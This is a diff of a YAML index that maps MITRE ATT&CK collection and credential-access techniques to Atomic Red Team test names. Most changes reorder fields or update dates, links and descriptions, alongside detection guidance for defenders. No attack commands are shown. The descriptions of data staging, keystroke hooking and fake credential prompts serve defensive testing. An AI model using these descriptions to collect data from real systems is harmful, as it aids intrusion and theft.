- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-25T22:48:14.605Z'
- created: '2020-02-20T21:09:55.995Z'
x_mitre_platforms:
- Linux
- macOS
@@ -46129,19 +47609,19 @@ collection:
phase_name: collection
modified: '2020-03-29T18:27:30.891Z'
created: '2020-02-20T21:08:52.529Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1560.001:
technique:
@@ -46177,21 +47657,21 @@ collection:
phase_name: collection
modified: '2020-03-25T21:54:37.374Z'
created: '2020-02-20T21:01:25.428Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- File monitoring
- Binary file metadata
- x_mitre_detection: |-
- Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1560.001
atomic_tests:
- name: Compress Data for Exfiltration With Rar
@@ -46465,23 +47945,24 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-06-18T13:16:53.385Z'
+ modified: '2020-07-14T19:42:10.235Z'
created: '2017-05-31T21:31:34.528Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_version: '1.0'
identifier: T1123
atomic_tests:
- name: using device audio capture commandlet
@@ -46496,30 +47977,30 @@ collection:
name: powershell
T1119:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1119
- external_id: T1119
+ created: '2017-05-31T21:31:27.985Z'
+ modified: '2020-03-31T22:18:43.019Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
- this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064)
+ this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
to search for and copy information fitting set criteria such as file type,
location, or name at specific time intervals. This functionality could also
be built into remote access tools. \n\nThis technique may incorporate use
of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
- and [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) to
+ and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to
identify and move files."
- name: Automated Collection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2019-07-16T19:44:07.942Z'
- created: '2017-05-31T21:31:27.985Z'
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1119
+ external_id: T1119
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_system_requirements:
- Permissions to access directories and files that store information of interest.
x_mitre_platforms:
@@ -46539,12 +48020,13 @@ collection:
access tools with built-in features may interact directly with the Windows
API to gather data. Data may also be acquired through Windows system management
tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1086).
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_data_sources:
- File monitoring
- Data loss prevention
- Process command-line parameters
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
identifier: T1119
atomic_tests:
- name: Automated Collection Command Prompt
@@ -46635,7 +48117,7 @@ collection:
- url: https://msdn.microsoft.com/en-us/library/ms649012
description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.
source_name: MSDN Clipboard
- - url: http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/
+ - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July
12, 2017.
source_name: Operating with EmPyre
@@ -46645,20 +48127,20 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-23T23:55:08.013Z'
+ modified: '2020-04-23T18:35:58.230Z'
created: '2017-05-31T21:31:25.967Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - API monitoring
- x_mitre_detection: Access to the clipboard is a legitimate function of many
- applications on an operating system. If an organization chooses to monitor
- for this behavior, then the data will likely need to be correlated against
- other suspicious or non-user-driven activity.
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: false
+ x_mitre_detection: Access to the clipboard is a legitimate function of many
+ applications on an operating system. If an organization chooses to monitor
+ for this behavior, then the data will likely need to be correlated against
+ other suspicious or non-user-driven activity.
+ x_mitre_data_sources:
+ - API monitoring
+ x_mitre_version: '1.1'
identifier: T1115
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
@@ -46723,19 +48205,19 @@ collection:
phase_name: collection
modified: '2020-03-24T16:42:09.222Z'
created: '2020-02-14T13:09:51.004Z'
- x_mitre_platforms:
- - SaaS
- x_mitre_data_sources:
- - Third-party application logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Third-party application logs
+ - Authentication logs
+ x_mitre_platforms:
+ - SaaS
atomic_tests: []
T1056.004:
technique:
@@ -46816,19 +48298,6 @@ collection:
phase_name: credential-access
modified: '2020-03-24T21:29:13.565Z'
created: '2020-02-11T19:01:15.930Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
x_mitre_data_sources:
- Windows event logs
- Process monitoring
@@ -46836,6 +48305,19 @@ collection:
- DLL monitoring
- Binary file metadata
- API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -46875,6 +48357,8 @@ collection:
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
external_references:
- source_name: mitre-attack
@@ -46884,23 +48368,22 @@ collection:
description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
April 5, 2017.
url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T17:26:16.286Z'
+ modified: '2020-06-24T18:59:16.039Z'
created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
x_mitre_platforms:
- Linux
- macOS
@@ -46908,10 +48391,15 @@ collection:
- AWS
- GCP
- Azure
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
atomic_tests: []
T1530:
technique:
@@ -46958,28 +48446,29 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-10-22T20:02:00.249Z'
+ modified: '2020-07-09T14:02:05.276Z'
created: '2019-08-30T18:07:27.741Z'
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Netskope
+ - Praetorian
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
permissions are set that is allowing access to data. Additionally, detecting
failed attempts by a user for a certain object, followed by escalation of
privileges by the same user, and access to the same object may be an indication
of suspicious activity.
- x_mitre_contributors:
- - Netskope
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_platforms:
- - AWS
- - GCP
- - Azure
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
atomic_tests: []
T1213:
technique:
@@ -47013,7 +48502,7 @@ collection:
* Source code snippets
* Links to network shares and other internal resources
- Information stored in a repository may vary based on specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001).
+ Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.
name: Data from Information Repositories
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416
@@ -47021,23 +48510,13 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T16:42:09.364Z'
+ modified: '2020-06-30T22:50:06.087Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - SaaS
- - AWS
- - GCP
- - Azure
- - Office 365
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
-
- The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Praetorian
+ - Milos Stojadinovic
x_mitre_data_sources:
- Azure activity logs
- AWS CloudTrail logs
@@ -47047,35 +48526,43 @@ collection:
- Authentication logs
- Data loss prevention
- Third-party application logs
- x_mitre_contributors:
- - Praetorian
- - Milos Stojadinovic
- x_mitre_version: '2.1'
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
+
+ The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - SaaS
+ - AWS
+ - GCP
+ - Azure
+ - Office 365
atomic_tests: []
T1005:
technique:
- id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data from Local System
- description: |
- Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
-
- Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+ created: '2017-05-31T21:30:20.537Z'
+ modified: '2020-05-26T19:21:25.974Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1005
external_id: T1005
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T15:40:46.979Z'
- created: '2017-05-31T21:30:20.537Z'
- x_mitre_contributors:
- - Praetorian
+ description: |
+ Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
+
+ Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
+ name: Data from Local System
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
x_mitre_version: '1.2'
x_mitre_data_sources:
- File monitoring
@@ -47093,9 +48580,6 @@ collection:
- Linux
- macOS
- Windows
- - GCP
- - AWS
- - Azure
x_mitre_is_subtechnique: false
atomic_tests: []
T1039:
@@ -47124,24 +48608,24 @@ collection:
phase_name: collection
modified: '2020-03-24T15:42:44.026Z'
created: '2017-05-31T21:30:41.022Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access network shared drive
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a network share. Remote access tools
with built-in features may interact directly with the Windows API to gather
data. Data may also be acquired through Windows system management tools such
as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_system_requirements:
- - Privileges to access network shared drive
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
atomic_tests: []
T1025:
technique:
@@ -47167,24 +48651,24 @@ collection:
phase_name: collection
modified: '2020-03-24T15:44:46.584Z'
created: '2017-05-31T21:30:31.584Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Privileges to access removable media drive and files
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_system_requirements:
- - Privileges to access removable media drive and files
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
atomic_tests: []
T1114:
technique:
@@ -47211,15 +48695,14 @@ collection:
phase_name: collection
modified: '2020-03-24T18:31:06.417Z'
created: '2017-05-31T21:31:25.454Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - Office 365 trace logs
- - Mail server
- - Email gateway
- - Authentication logs
- - File monitoring
- - Process monitoring
- - Process use of network
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -47230,14 +48713,15 @@ collection:
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_data_sources:
+ - Office 365 trace logs
+ - Mail server
+ - Email gateway
+ - Authentication logs
+ - File monitoring
+ - Process monitoring
+ - Process use of network
+ x_mitre_version: '2.1'
atomic_tests: []
T1114.003:
technique:
@@ -47278,25 +48762,25 @@ collection:
phase_name: collection
modified: '2020-03-24T18:29:48.994Z'
created: '2020-02-19T18:54:47.103Z'
- x_mitre_platforms:
- - Office 365
- - Windows
+ x_mitre_contributors:
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
+
+ Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
x_mitre_data_sources:
- Process use of network
- Process monitoring
- Email gateway
- Mail server
- Office 365 trace logs
- x_mitre_detection: |-
- Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
-
- Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_platforms:
+ - Office 365
+ - Windows
atomic_tests: []
T1056.002:
technique:
@@ -47350,24 +48834,24 @@ collection:
phase_name: credential-access
modified: '2020-03-24T20:56:14.853Z'
created: '2020-02-11T18:58:45.908Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
-
- Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Matthew Molyett, @s1air, Cisco Talos
x_mitre_data_sources:
- PowerShell logs
- User interface
- Process command-line parameters
- Process monitoring
- x_mitre_contributors:
- - Matthew Molyett, @s1air, Cisco Talos
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
+
+ Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -47435,22 +48919,9 @@ collection:
phase_name: credential-access
modified: '2020-03-24T21:29:13.900Z'
created: '2017-05-31T21:30:48.323Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
- x_mitre_detection: 'Detection may vary depending on how input is captured but
- may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
- `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
